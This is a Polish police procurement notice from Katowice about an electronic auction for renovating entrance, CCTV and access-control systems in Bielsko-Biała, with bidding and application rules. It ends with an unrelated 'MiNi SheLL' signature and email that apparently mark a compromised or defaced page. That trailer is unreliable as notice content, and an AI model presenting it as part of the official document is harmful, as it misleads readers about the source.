<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Licytacja elektroniczna na: Remont wejścia, monitoringu i kontroli dostępu w budynku Samodzielnego Pododdziału Prewencji Policji w Bielsku - Białej 2. Po zalogowaniu się
na platformie, Wykonawcy dopuszczeni do udziału w licytacji uzyskują dostęp do aplikacji umożliwiającej
składanie ofert. Wykonawcy składają swoje oferty cenowe w postaci elektronicznej. 3. W toku licytacji
elektronicznej wykonawcy dopuszczeni do udziału w licytacji składają kolejne korzystniejsze postąpienia.
Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 4. Oferta złożona w toku
licytacji przestaje wiązać gdy inny Wykonawca złożył ofertę korzystniejszą. 5. W toku licytacji Wykonawcy
proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy
oddzielić od złotych kropką. 6. Cenę oferty brutto stanowi łączny koszt wykonania zamówienia obejmujący
całość robót budowlanych przewidzianych w załączniku nr 3 i nr 4 do ogłoszenia oraz
wszystkie inne koszty z tym związane. Przed przystąpieniem do złożenia postąpienia Wykonawca winien
obliczyć cenę oferty tak, aby możliwe było przygotowanie przez Wykonawcę kosztorysu ofertowego w
oparciu o załącznik nr 4 do ogłoszenia. 7. Oferta złożona przez Wykonawcę winna być niższa od oferty
najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 8. Zamawiający przyjął za minimalne
postąpienie wartość 1 000,00 PLN. System nie przyjmie postąpienia, którego wysokość jest mniejsza od
określonego minimalnego postąpienia. 9. W toku licytacji system na bieżąco udostępnia wszystkim
Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w
licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie
ujawnia się informacji umożliwiających identyfikację Wykonawców. 10. Zamawiający przyjął za cenę
wywoławczą brutto za całość zamówienia i koszty związane z realizacją zamówienia w wysokości
149000,00 PLN 11. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto.
12. W przypadku podania w trakcie licytacji ceny, której nie da się sporządzić kosztorysu ofertowego
Wykonawca zobowiązany jest prawidłowego przygotowania kosztorysu ofertowego i przeliczenia ceny, przy
czym wartość ceny ofertowej wpisanej w formularzu ofertowym wyliczonej na podstawie kosztorysu
ofertowego nie może przekroczyć ceny wylicytowanej w trakcie licytacji elektronicznej..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 10 minut od ostatniego postąpienia</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 15.04.2013 godzina 12:00, miejsce: Komenda Wojewódzka Policji w Katowicach 40-038 Katowice ul. Lompy 19. Zespół
Zamówień Publicznych KWP blok C piętro VII pokój 735.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od dnia przekazania Wykonawcom zaproszenia do
składania ofert, godz. 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta jeżeli w ciągu 10 minut od złożenia najkorzystniejszego postąpienia, żaden z Wykonawców nie złoży korzystniejszego postąpienia</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1. Zgodnie z projektem umowy - załącznik nr 2 do ogłoszenia wybrany Wykonawca zobowiązany będzie
wnieść zabezpieczenie należytego wykonania umowy w wysokości 10 % ceny całkowitej podanej w
formularzu ofertowym po przeprowadzonej licytacji elektronicznej. Najpóźniej w dniu zawarcia umowy
Wykonawca musi wnieść 100 % wartości zabezpieczenia. Zabezpieczenie Wykonawca wnosi w sposób
określony w § 5 projektu umowy. Zabezpieczenie należy wnieść w formach określonych art. 148 ust. 1
ustawy Prawo Zamówień Publicznych w pieniądzu, poręczeniach bankowych, poręczeniach spółdzielczej
kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o
których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości. 2. Zamawiający nie wyraża zgody na wniesienie zabezpieczenia: - w wekslach z
poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej, - przez ustanowienie
zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu
terytorialnego, - przez ustanowienie zastawu rejestrowego na zasadach określonych w przepisach o
zastawie rejestrowym i rejestrze zastawów. 3. Zamawiającego nie wyraża zgody na tworzenie
zabezpieczenia należytego wykonania umowy przez potrącenia z należności za częściowo wykonane roboty
budowlane. 4. Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy
wskazany przez Zamawiającego w załączniku nr 2 do ogłoszenia - projekcie umowy 5. W zawiązku z
zabezpieczeniem wnoszonym w innej formie niż pieniężnej Zamawiający informuje, że § 11 Regulaminu
Narodowego Banku Polskiego tj. banku, który prowadzi obsługę bankową Zamawiającego, NBP nie
poświadcza kart wzorów podpisów oraz innych dokumentów posiadacza rachunku w związku z
dokonywaniem przez niego innych czynności poza NBP. Tym samym taki zapis w przedkładanym jako
zabezpieczenie dokumencie nie będzie dopuszczany przez Zamawiającego</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Szczegółowe warunki umowy zawarte są w załączonym projekcie umowy w załączniku nr 2 do ogłoszenia
dostępnym na stronie www.bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CENA: Wykonawca, który wygra licytację, przed zawarciem umowy wypełni Formularz
ofertowy - załącznik nr 6 do ogłoszenia dostępny na stronie www.bip.katowice.kwp.policja.gov.pl oraz
opracuje szczegółowy kosztorys ofertowy na podstawie załączników nr 3  i nr 4 do ogłoszenia
dostępnych na stronie www.bip.katowice.kwp.policja.gov.pl. Przygotowany szczegółowy kosztorys ofertowy
będzie stanowił załącznik do Formularza ofertowego. Cena ofertowa wskazana w Formularzu ofertowym
będzie musiała zostać wyliczona na podstawie szczegółowego kosztorysu ofertowego. PRZEKAZANIE
WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI: 1.Wniosek ma być złożony w zamkniętej,
zabezpieczonej kopercie (kopertach) nie jest dopuszczalne złożenie wniosku w formie elektroniczne - za
sposób zabezpieczenia kopert/y odpowiada Wykonawca. 2. Koperta ma być zaadresowana na
Zamawiającego i oznaczona: ZP-2380-170-15/13 Wniosek o dopuszczenie do udziału w licytacji elektronicznej
na Remont wejścia, monitoringu i kontroli dostępu w budynku Samodzielnego Pododdziału Prewencji Policji w Bielsku - Białej. Adres Zamawiającego: Komenda Wojewódzka Policji w Katowicach Zespół
Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 blok C piętro VII pokój 735 Nie otwierać przed
komisyjnym otwarciem wniosków 3. Ponadto koperta winna spełniać warunek uniemożliwiający odczytanie
jej zawartości i oznaczona nazwą (firmą) i adresem Wykonawcy z uwagi na pkt. 4 4. Wnioski złożone po
terminie nie będą rozpatrywane. Wszystkie wnioski otrzymane po terminie składania zostaną zwrócone
Wykonawcom po upływie ostatecznego terminu składania wniosków. OPIS SPOSOBU PRZYGOTOWANIA
WNIOSKÓW: 1. Wykonawca składa: wypełniony wniosek o dopuszczenie do udziału w postępowaniu wg.
wzoru załącznika nr 1 do ogłoszenia oraz dokumenty i załączniki wskazane w Sekcji III.6 ogłoszenia 2.
Wniosek o dopuszczenie do udziału w postępowaniu oraz wszystkie załączniki w tym dokumenty i
oświadczenia, mają być w całości sporządzone w języku polskim, ręcznie, na maszynie do pisania lub
komputerze (w sposób czytelny) oraz podpisany w sposób określony pkt. 3 przez osoby uprawnione
(podpisujące wniosek). Osoba uprawniona to osoba, która jest wymieniona w aktualnym odpisie z
właściwego rejestru lub działająca z jej upoważnienia. 3. Wszystkie dokumenty w złożonym wniosku muszą
być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione i
opieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnie przez
osoby uprawnione. Nie dotyczy załączników składanych jako oryginały wystawione i podpisane przez
uprawnione organy np. KRS. Dokumenty wielostronicowe mogą być opieczętowane pieczątką imienną i
podpisane lub podpisane czytelnie przez osoby uprawnione i opieczętowane pieczęciami firmowymi lub
sporządzone na papierze firmowym i podpisane czytelnie przez osoby uprawnione na pierwszej lub ostatniej
jego stronie. Dokumenty mogą być składane w formie oryginału lub kserokopii poświadczonej przez
Wykonawcę za zgodność z oryginałem. W przypadku składania dokumentów wydanych w języku innym niż
język polski, dokumenty te są składane wraz z tłumaczeniem na język polski, poświadczonym przez
Wykonawcę. Uwaga: Przez podpis czytelny Zamawiający rozumie podpis odręczny, zawierający imię i
nazwisko pozwalający na identyfikację osoby, która go złożyła. 4. W przypadku podpisywania wniosku przez
osobę nie wymienioną w aktualnym odpisie z właściwego rejestru,niezbędne jest we wniosku
pełnomocnictwo dla osoby działającej w imieniu Wykonawcy w formie oryginału lub jego poświadczonej
notarialnie kopii. Pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona
jest osoba podpisująca wniosek o dopuszczenie do udziału w postępowaniu. 5. W przypadku Wykonawców
ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego na podstawie art. 23 ust. 2
ustawy PZP wynika obowiązek ustanowienia pełnomocnika do reprezentowania ich w prowadzonym
postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. W związku z powyższym
niezbędne jest przedłożenie w wniosku pełnomocnictwa w formie oryginału lub jego poświadczonej
notarialnie kopii w celu ustalenia podmiotu uprawnionego do występowania w imieniu grupy Wykonawców w
sposób umożliwiający identyfikację Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
Uwaga: W przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnego dokumentu zawierającego
pełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólników ma
wynikać z samej umowy spółki cywilnej dołączonej do wniosku. 6. Wszelkie miejsca, w których Wykonawca
naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek (osobę uprawnioną). 7.
Wszelkie dokumenty składane na papierze światłoczułym uznane zostaną za nieważne. 8. Wnioski o
dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania o wynikach oceny spełniania
warunków udziału w postępowaniu art. 96 ust 3. Nie ujawnia się informacji umożliwiających identyfikację
Wykonawcy podczas licytacji (login) aż do momentu jej zamknięcia oraz informacji stanowiących tajemnicę
przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie
później niż w terminie składania wniosku zastrzegł, że nie mogą być one udostępniane. 9. Jeżeli Wykonawca
chce zastrzec strony ww. wniosku wówczas składa je w dodatkowej zabezpieczonej kopercie, z opisem
INFORMACJE STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA. 10. Podmiot prowadzący działalność
gospodarczą jako osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości
prawnej, może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu, sam lub jako Partner
Konsorcjum firm. 11. W przypadku złożenia przez jednego Wykonawcę dwóch lub więcej wniosków o
dopuszczenie do udziału w postępowaniu Zamawiający uzna złożenie wniosku za ważne i dopuści
Wykonawcę do udziału w postępowaniu na podstawie wszystkich złożonych wniosków. ISTOTNE DLA
STRON POSTANOWIENIA, KTÓRE ZOSTANĄ WPROWADZONE DO TREŚCI ZAWIERANEJ UMOWY W
SPRAWIE ZAMÓWIENIA PUBLICZNEGO Szczegółowe warunki umowy zawarte są w załączonym projekcie
umowy w załączniku nr 2 do ogłoszenia dostępnym na stronie www.bip.katowice.kwp.policja.gov.pl
INFORMACJA O FORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO
PRZEPROWADZENIU LICYTACJI W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA
PUBLICZNEGO. 1. Przed podpisaniem umowy Wykonawca dostarcza Zamawiającemu wypełniony
formularz ofertowy stanowiący załącznik nr 6 do ogłoszenia dostępny na stronie
www.bip.katowice.kwp.policja.gov.pl oraz szczegółowy kosztorys ofertowy opracowany na podstawie
załącznika nr 4 do ogłoszenia dostępnego na stronie www.bip.katowice.kwp.policja.gov.pl. 2. Błędne
wypełnienie formularza ofertowego lub szczegółowego kosztorysu ofertowego, w tym niezgodność z
załącznikiem nr 4 do ogłoszenia - przedmiar robót , będzie skutkowało wezwaniem Wykonawcy do
przedłożenia prawidłowego formularza ofertowego lub szczegółowego kosztorysu ofertowego, a w
przypadku odmowy jego poprawienia Zamawiający uzna, iż Wykonawca uchyla się od zawarcia umowy w
sprawie zamówienia publicznego i będzie miał zastosowanie art 94 ust. 3 ustawy Prawo Zamówień
Publicznych. 3. Umowa zawarta z Wykonawcą będzie realizowana w oparciu o ceny i składniki cenotwórcze
podane w szczegółowym kosztorysie ofertowym 4. W przypadku wygrania licytacji przez Wykonawcę
będącego spółką z ograniczoną odpowiedzialnością, którego wartość oferty przewyższa dwukrotnie
wysokość kapitału zakładowego Wykonawca zobowiązany jest najpóźniej w dniu podpisania umowy do
przedłożenia uchwały wspólników lub odpisu umowy spółki wyrażającej zgodę na zaciągnięcie zobowiązania
(art. 230 Kodeksu Spółek Handlowych). Powyższe dotyczy również Wykonawców ubiegających się wspólnie
o udzielenie zamówienia publicznego. 6. W przypadku wygrania licytacji przez Wykonawców ubiegających
się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie
umowy konsorcjum, która będzie regulować wzajemną współpracę Wykonawców czyli zawierać
postanowienia dotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania
rozliczeń. Zgodnie z treścią art. 141 ustawy PZP Wykonawcy ubiegający się wspólnie o udzielenie
zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej
odpowiedzialności zostały uregulowane art. 366 § 1 Kodeksu cywilnego. Umowa regulująca współpracę
podmiotów występujących wspólnie (konsorcjum) ma m.in.: - upoważniać jednego z członków konsorcjum -
Głównego Partnera - jako osobę prawną i reprezentującą go wskazaną osobę fizyczną, do występowania w
imieniu każdego z pozostałych Partnerów we wszystkich sprawach związanych z umową; - stwierdzać, że
Partnerzy będą odpowiedzialni solidarnie za całość podjętych zobowiązań w ramach realizacji zamówienia; -
być zawarta na czas trwania umowy, aż do ostatecznego wygaśnięcia obowiązków i praw wobec
zamawiającego; - być zawarta w formie pisemnej - określać zakres rzeczowo-finansowy każdego z członków
konsorcjum 7. Wykonawca jest zobligowany najpóźniej w dniu zawarcia umowy przekazać Zamawiającemu
informację dotyczącą imienia i nazwiska osób oraz nr uprawnienia, które będą pełniły funkcje wskazane w §
2 ust. 7 projektu umowy. INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z
WYKONAWCAMI WRAZ ZE WSKAZANIEM PRZEZ ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO
POROZUMIEWANIA SIĘ Z WYKONAWCAMI: 1. Wszelkie oświadczenia, wnioski, zawiadomienia oraz
informacje Zamawiający i Wykonawcy przekazują pisemnie do momentu otwarcia licytacji. Oświadczenia,
wnioski, zawiadomienia oraz informacje przekazane za pomocą faxu lub drogą elektroniczną uważa się za
złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie
potwierdzona na piśmie (doręczone pocztą lub osobiście) na adres: Komenda Wojewódzka Policji w
Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19. (art. 27 ustawy Prawo
Zamówień Publicznych). 2. Wykonawcy zobowiązani są do wskazania we wniosku o dopuszczenie do
udziału w postępowaniu stanowiącym załącznik nr 1 do ogłoszenia numeru telefonu oraz numeru faksu lub
adresu poczty elektronicznej, na który Zamawiający będzie przesyłał Wykonawcy wszelkie pisma
przekazywane w ramach postępowania. Wykonawca wybiera faks albo pocztę elektroniczną według
własnego uznania. W przypadku wpisania przez Wykonawcę zarówno numeru faksu jak i adresu poczty
elektronicznej Zamawiający będzie przesylał zeskanowane dokumenty pocztą elektroniczną. W przypadku
wyboru przez Wykonawcę poczty elektronicznej Wykonawca ponosi pełną odpowiedzialność za odbieranie
przekazywanej poczty. W przypadku zaniechania odebrania przekazanej poczty Wykonawca ponosi wszelkie
wynikające z tego skutki. Zamawiający nie wymaga potwierdzenia otrzymania przekazywanego pisma drogą
elektroniczną. W przypadku wyboru przez Wykonawcę jako drogi otrzymywania pism nadawanych przez
Zamawiającego drogą faksową Wykonawca ponosi odpowiedzialność za sprawdzenie kompletności i
czytelności otrzymania przesłanego pisma. Brak kompletności lub czytelności Wykonawca niezwłocznie
zgłasza Zamawiającemu telefonicznie na nr 32 200-20-50. Za dowód skutecznego przesłania pisma do
Wykonawcy drogą faksową Zamawiający uznaje potwierdzenie przesłania faksowego OK na numer podany
przez Wykonawcę na formularzu ofertowym i wykazany na potwierdzeniu faksowym. Zamawiający nie
wymaga potwierdzenia otrzymania przekazywanego pisma drogą faksową. Wykonawca zobowiązany jest do
powiadomienia Zamawiającego w przypadku zmiany numeru telefonu, faksu lub adresu poczty
elektronicznej, na który Zamawiający ma przesyłać pisma. W przypadku nie dokonania powiadomienia
Zamawiającego, przesłanie pisma na numer faksu lub adres poczty elektronicznej wskazany na wniosku
zgodnie z zasadami wskazanymi w niniejszym punkcie uważa się za skutecznie dokonane.Zaproszenia do
udziału w licytacji zostaną przekazane faxem i potwierdzone pocztą. 3. Przesyłanie wszelkich informacji,
oświadczeń, zaświadczeń drogą faksową i elektroniczną może odbywać się tylko w dniach urzędowania
Komendy (od poniedziałku do piątku w godzinach 7.30-15.30) na numer 032 200 20 60 lub e-mail:
zamowienia@ka.policja.gov.pl. UWAGA: W przypadku przesłania dokumentu po godzinie 15.30 w dniu
roboczym spowoduje, iż zostanie on zarejestrowany u Zamawiającego jako złożony w następnym dniu
roboczym. W przypadku przesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany u
Zamawiającego jako złożony w pierwszym następującym dniu roboczym. fax. 032 2002060, e mail:
zamowienia@ka.policja.gov.pl 5. Od momentu otwarcia do momentu zamknięcia licytacji Zamawiający i
Wykonawcy wszelkiego rodzaju wnioski,oświadczenia i inne informacje przekazują drogą elektroniczną za
pośrednictwem platformy licytacyjnej; wiadomości przekazywane Wykonawcom będą widoczne w zakładce
moje wiadomości POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH
WYKONAWCY W TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA. Wykonawcy w toku
postępowania o udzielenie zamówienia przysługują środki ochrony prawnej określone w dziale VI ustawy
Prawo Zamówień Publicznych. Projekt realizowany częściowo w ramach przedsięwzięcia pod tytułem:
MODERNIZACJA GOSPODARKI CIEPLNEJ W ODDZIAŁACH PREWENCJI POLICJI KATOWICE ul.
Koszarowa 17 Dofinansowanego z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com